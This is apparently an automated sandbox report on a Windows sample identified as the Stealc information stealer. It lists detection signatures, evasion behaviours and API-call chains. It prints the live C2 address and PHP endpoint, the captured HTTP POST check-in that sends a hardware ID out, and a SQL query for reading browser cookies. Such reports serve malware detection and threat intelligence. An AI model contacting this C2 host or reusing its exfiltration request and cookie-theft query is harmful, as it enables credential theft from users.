
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561690
MD5: 358f03c97356f147bacbfe66db998b47
SHA1: 86778c0cabcb58f05672a91feb182eecef95e8b8
SHA256: 292c01862fad9dc3ab9a0348756832a5f44273ea50b23088f77fa0e5acaec7d4
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2664 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 358F03C97356F147BACBFE66DB998B47)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000003.2210616498.0000000004E10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 2664 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 2664 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T05:11:17.649446+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206//oY= | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/ToN= | Avira URL Cloud: Label: malware
Source: file.exe.2664.1.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: file.exe | Virustotal: Detection: 51%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00434C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004360D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004540B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00446960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0043EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00446B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00439B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00439B80 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00437750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004418A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00443910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00441250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00441269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0044E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00444B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00444B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0044CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0043DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00442390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0043DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004423A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0044D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0044DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004316A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004316B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49714 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC | Host: 185.215.113.206 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 41 38 35 46 39 43 46 41 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a | Data Ascii: ------FCGIJDBAFCBAAKECGDGC Content-Disposition: form-data; name="hwid" A8A85F9CFA63748140731 ------FCGIJDBAFCBAAKECGDGC Content-Disposition: form-data; name="build" mars ------FCGIJDBAFCBAAKECGDGC--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00436C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC | Host: 185.215.113.206 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 41 38 35 46 39 43 46 41 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a | Data Ascii: ------FCGIJDBAFCBAAKECGDGC Content-Disposition: form-data; name="hwid" A8A85F9CFA63748140731 ------FCGIJDBAFCBAAKECGDGC Content-Disposition: form-data; name="build" mars ------FCGIJDBAFCBAAKECGDGC--
Source: file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206%
Source: file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206//oY=
Source: file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ToN=
Source: file.exe, 00000001.00000002.2252021419.0000000001053000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2252021419.0000000001044000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000001.00000002.2252021419.0000000001053000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phph
Source: file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00439770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_004548B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_006E81CA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007FD9AC
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0080C281
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F4AE4
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00803A6D
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_006B5A84
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F9B73
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00720BEB
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00800428
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007D4D46
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007FB599
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_006C2599
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F6661
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0075EE38
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0080563B
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00840674
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00801F8E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0080A797
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007CA78C
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00434A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: dfcaugdi ZLIB complexity 0.9950350087347606
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00453A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0044CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FICSO1SK.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
Source: file.exe | Virustotal: Detection: 51%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
